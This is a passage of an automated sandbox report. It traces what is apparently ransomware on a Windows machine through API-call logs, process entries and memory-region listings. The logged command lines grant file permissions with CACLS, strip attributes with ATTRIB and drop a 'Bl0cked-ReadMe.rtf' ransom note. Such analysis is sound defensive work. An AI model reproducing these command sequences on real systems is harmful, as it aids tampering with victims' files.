out: hFindFile=0x3f2180) returned 1 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.024] GetLastError () returned 0x2 [0177.024] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3f2180 [0177.024] FindClose (in: hFindFile=0x3f2180 | out: hFindFile=0x3f2180) returned 1 [0177.024] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.024] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.024] GetConsoleTitleW (in: lpConsoleTitle=0x24f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.025] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f230 | out: lpAttributeList=0x24f168, lpSize=0x24f230) returned 1 [0177.025] UpdateProcThreadAttribute (in: lpAttributeList=0x24f168, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f168, lpPreviousValue=0x0) returned 1 [0177.025] GetStartupInfoW (in: lpStartupInfo=0x24f124 | out: lpStartupInfo=0x24f124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0177.025] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.026] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f210 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x24f210*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd50, dwThreadId=0xd64)) returned 1 [0177.040] CloseHandle (hObject=0x4c) returned 1 [0177.040] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.040] GetEnvironmentStringsW () returned 0x3f0308* [0177.040] FreeEnvironmentStringsW (penv=0x3f0308) returned 1 [0177.040] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0177.222] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x24f104 | out: lpExitCode=0x24f104*=0x0) returned 1 [0177.222] CloseHandle (hObject=0x50) returned 1 [0177.222] _vsnwprintf (in: _Buffer=0x24f24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f110 | out: _Buffer="00000000") returned 8 [0177.222] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.222] GetEnvironmentStringsW () returned 0x3f2410* [0177.222] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.222] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.222] GetEnvironmentStringsW () returned 0x3f2410* [0177.222] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.223] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f168 | out: lpAttributeList=0x24f168) [0177.223] GetConsoleTitleW (in: lpConsoleTitle=0x24f54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.223] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0177.223] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0177.223] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0177.223] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.223] GetLastError () returned 0x2 [0177.223] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.223] GetLastError () returned 0x2 [0177.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3ee4d8 [0177.224] FindClose (in: hFindFile=0x3ee4d8 | out: hFindFile=0x3ee4d8) returned 1 [0177.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0xffffffff [0177.224] GetLastError () returned 0x2 [0177.224] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ede8) returned 0x3ee4d8 [0177.224] FindClose (in: hFindFile=0x3ee4d8 | out: hFindFile=0x3ee4d8) returned 1 [0177.224] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0177.224] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0177.224] GetConsoleTitleW (in: lpConsoleTitle=0x24f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0177.224] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f230 | out: lpAttributeList=0x24f168, lpSize=0x24f230) returned 1 [0177.224] UpdateProcThreadAttribute (in: lpAttributeList=0x24f168, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f168, lpPreviousValue=0x0) returned 1 [0177.224] GetStartupInfoW (in: lpStartupInfo=0x24f124 | out: lpStartupInfo=0x24f124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0177.224] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0177.224] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x24f1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24f210 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessInformation=0x24f210*(hProcess=0x4c, hThread=0x50, dwProcessId=0x410, dwThreadId=0xb38)) returned 1 [0177.226] CloseHandle (hObject=0x50) returned 1 [0177.226] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0177.226] GetEnvironmentStringsW () returned 0x3f2410* [0177.226] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.226] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0177.430] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x24f104 | out: lpExitCode=0x24f104*=0x0) returned 1 [0177.431] CloseHandle (hObject=0x4c) returned 1 [0177.431] _vsnwprintf (in: _Buffer=0x24f24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f110 | out: _Buffer="00000000") returned 8 [0177.431] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0177.431] GetEnvironmentStringsW () returned 0x3f2410* [0177.431] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.431] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0177.431] GetEnvironmentStringsW () returned 0x3f2410* [0177.431] FreeEnvironmentStringsW (penv=0x3f2410) returned 1 [0177.431] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f168 | out: lpAttributeList=0x24f168) [0177.431] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.431] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.432] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.432] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.432] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.432] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.432] SetConsoleInputExeNameW () returned 0x1 [0177.432] GetConsoleOutputCP () returned 0x1b5 [0177.432] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.432] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.432] exit (_Code=0) Process: id = "318" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c80" os_pid = "0xd50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "317" os_parent_pid = "0xa5c" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24516 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24517 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24518 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24519 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24520 start_va = 0x720000 end_va = 0x728fff entry_point = 0x720000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 24521 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24522 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24523 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24524 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 24525 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24526 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24527 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24528 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24529 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 24530 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 24531 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24532 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24533 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24534 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24535 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24536 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24537 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 430 os_tid = 0xd64 Thread: id = 431 os_tid = 0xd04 Process: id = "319" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c80" os_pid = "0x410" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "317" os_parent_pid = "0xa5c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24552 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24553 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24554 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24555 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 24556 start_va = 0xf40000 end_va = 0xf46fff entry_point = 0xf40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 24557 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24558 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24559 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24560 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24561 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24562 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24563 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24564 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24565 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 24566 start_va = 0x5f0000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 24567 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 24568 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24569 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 24570 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24571 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24572 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 24573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24576 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 24577 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24578 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24579 start_va = 0x150000 end_va = 0x217fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 24580 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24581 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 432 os_tid = 0xb38 Process: id = "320" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xcc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24582 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24583 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24584 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24585 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 24586 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24587 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24588 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24589 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24590 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 24591 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24592 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24593 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24594 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24595 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 24596 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 24597 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24598 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24599 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24600 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24601 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24602 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24603 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24604 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24605 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24606 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24607 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24608 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 